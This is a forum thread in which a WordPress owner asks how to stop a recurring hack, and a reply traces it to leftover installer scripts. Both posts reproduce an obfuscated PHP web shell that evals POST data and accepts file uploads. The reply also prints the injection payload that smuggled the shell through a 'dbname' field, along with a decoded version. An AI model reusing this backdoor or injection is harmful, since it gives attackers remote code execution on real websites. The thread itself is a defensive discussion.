Wordpress hack keeps severing database connection

Question

I have a Wordpress site that keeps severing database connection and I am not sure how to find or clean up or get rid of the root cause.

The issue is that there is this odd script that keeps popping up on the wp-config.php file. I delete it, correct the credentials, site comes back up just fine. In about a day or so- same thing happens. The database credentials are reset and this foreign script appears again.

This is the output I keep seeing after the attack:

// ** MySQL settings - You can get this info from your web host ** //
/** The name of the database for WordPress */
define('DB_NAME', 'test');
file_put_contents('accesson.php', '<?php echo 7457737+736723;$raPo_rZluoE=base64_decode("Y".chr(109)."F".chr(122).chr(90)."T".chr(89).chr(48).chr(88)."2"."R"."l"."Y".chr(50)."9".chr(107)."Z".chr(81)."="."=");$ydSJPtnwrSv=base64_decode(chr(89)."2".chr(57).chr(119).chr(101).chr(81).chr(61)."=");eval($raPo_rZluoE($_POST[base64_decode(chr(97).chr(87)."Q".chr(61))]));if($_POST[base64_decode("d".chr(88).chr(65)."=")] == base64_decode("d"."X".chr(65).chr(61))){@$ydSJPtnwrSv($_FILES[base64_decode(chr(90)."m"."l"."s".chr(90)."Q"."=".chr(61))][base64_decode(chr(100).chr(71).chr(49)."w"."X".chr(50)."5".chr(104)."b".chr(87)."U".chr(61))],$_FILES[base64_decode("Z".chr(109)."l"."s".chr(90)."Q".chr(61).chr(61))][base64_decode(chr(98)."m"."F".chr(116)."Z".chr(81).chr(61)."=")]);}; ?>'); /*');
file_put_contents('accesson.php', '<?php echo 7457737+736723;$raPo_rZluoE=base64_decode("Y".chr(109)."F".chr(122).chr(90)."T".chr(89).chr(48).chr(88)."2"."R"."l"."Y".chr(50)."9".chr(107)."Z".chr(81)."="."=");$ydSJPtnwrSv=base64_decode(chr(89)."2".chr(57).chr(119).chr(101).chr(81).chr(61)."=");eval($raPo_rZluoE($_POST[base64_decode(chr(97).chr(87)."Q".chr(61))]));if($_POST[base64_decode("d".chr(88).chr(65)."=")] == base64_decode("d"."X".chr(65).chr(61))){@$ydSJPtnwrSv($_FILES[base64_decode(chr(90)."m"."l"."s".chr(90)."Q"."=".chr(61))][base64_decode(chr(100).chr(71).chr(49)."w"."X".chr(50)."5".chr(104)."b".chr(87)."U".chr(61))],$_FILES[base64_decode("Z".chr(109)."l"."s".chr(90)."Q".chr(61).chr(61))][base64_decode(chr(98)."m"."F".chr(116)."Z".chr(81).chr(61)."=")]);}; ?>'); /*');

/** MySQL database username */
define('DB_USER', 'user');

/** MySQL database password */
define('DB_PASSWORD', 'taskh60J0f');

The code seems to reference accesson.php. So I looked at that file and this is the code that it has:

<?php echo 7457737+736723;$raPo_rZluoE=base64_decode("Y".chr(109)."F".chr(122).chr(90)."T".chr(89).chr(48).chr(88)."2"."R"."l"."Y".chr(50)."9".chr(107)."Z".chr(81)."="."=");$ydSJPtnwrSv=base64_decode(chr(89)."2".chr(57).chr(119).chr(101).chr(81).chr(61)."=");eval($raPo_rZluoE($_POST[base64_decode(chr(97).chr(87)."Q".chr(61))]));if($_POST[base64_decode("d".chr(88).chr(65)."=")] == base64_decode("d"."X".chr(65).chr(61))){@$ydSJPtnwrSv($_FILES[base64_decode(chr(90)."m"."l"."s".chr(90)."Q"."=".chr(61))][base64_decode(chr(100).chr(71).chr(49)."w"."X".chr(50)."5".chr(104)."b".chr(87)."U".chr(61))],$_FILES[base64_decode("Z".chr(109)."l"."s".chr(90)."Q".chr(61).chr(61))][base64_decode(chr(98)."m"."F".chr(116)."Z".chr(81).chr(61)."=")]);}; ?>

I reset the db connection again and deleted the accesson.php file from the root directory but am not 100% that this will no longer occur. My question is how do I clean this up 100%? I also want to note that I am not a developer. I know how to read code, but am not real proficient at writing it. Any help would greatly be appreciated.

Answer 1

Had the same attack on a site we have recently started hosting - repeated extra code added to config and accession.php dropped into the web root.

In our instance the cause of the problem was a file named installer.php and another file named installer-backup.php - these came with the site when we imported it.

In one of our protection plug-in threat logs we found repeated POST attempts to installer and installer-backup.php details as follows.

    "name": "POST.dbname",
        "value": "test\\');\nfile_put_contents(\\'accesson.php\\', \\'<?php echo 7457737+736723;$raPo_rZluoE=base64_decode(\\\"Y\\\".chr(109).\\\"F\\\".chr(122).chr(90).\\\"T\\\".chr(89).chr(48).chr(88).\\\"2\\\".\\\"R\\\".\\\"l\\\".\\\"Y\\\".chr(50).\\\"9\\\".chr(107).\\\"Z\\\".chr(81).\\\"=\\\".\\\"=\\\");$ydSJPtnwrSv=base64_decode(chr(89).\\\"2\\\".chr(57).chr(119).chr(101).chr(81).chr(61).\\\"=\\\");eval($raPo_rZluoE($_POST[base64_decode(chr(97).chr(87).\\\"Q\\\".chr(61))]));if($_POST[base64_decode(\\\"d\\\".chr(88).chr(65).\\\"=\\\")] == base64_decode(\\\"d\\\".\\\"X\\\".chr(65).chr(61))){@$ydSJPtnwrSv($_FILES[base64_decode(chr(90).\\\"m\\\".\\\"l\\\".\\\"s\\\".chr(90).\\\"Q\\\".\\\"=\\\".chr(61))][base64_decode(chr(100).chr(71).chr(49).\\\"w\\\".\\\"X\\\".chr(50).\\\"5\\\".chr(104).\\\"b\\\".chr(87).\\\"U\\\".chr(61))],$_FILES[base64_decode(\\\"Z\\\".chr(109).\\\"l\\\".\\\"s\\\".chr(90).\\\"Q\\\".chr(61).chr(61))][base64_decode(chr(98).\\\"m\\\".\\\"F\\\".chr(116).\\\"Z\\\".chr(81).chr(61).\\\"=\\\")]);}; ?>\\'); \/*"

This creates the accession.php file withe the code as per the original post.

Decoding that gives:

    echo 7457737+736723;
    $raPo_rZluoE = 'base64_decode';
    $ydSJPtnwrSv = 'copy=';
    eval(base64_decode($_POST['id']));
    if($_POST['up'] == 'up'){copy($_FILES['file']['tmp_name'],$_FILES['file']['name']);}

So looks like accession.php will do what its name suggest and provide a route to copy files onto the server.

This necessitated a total wipe out and rebuild after a manual scan of the db - which did not show anything suspicious.

Nothing untoward has happened since the rebuild except someone is making many attempts to POST to no non-existent installer and installer-backup.php.

Interestingly, we have so far not seen any attempts to POST to accession.php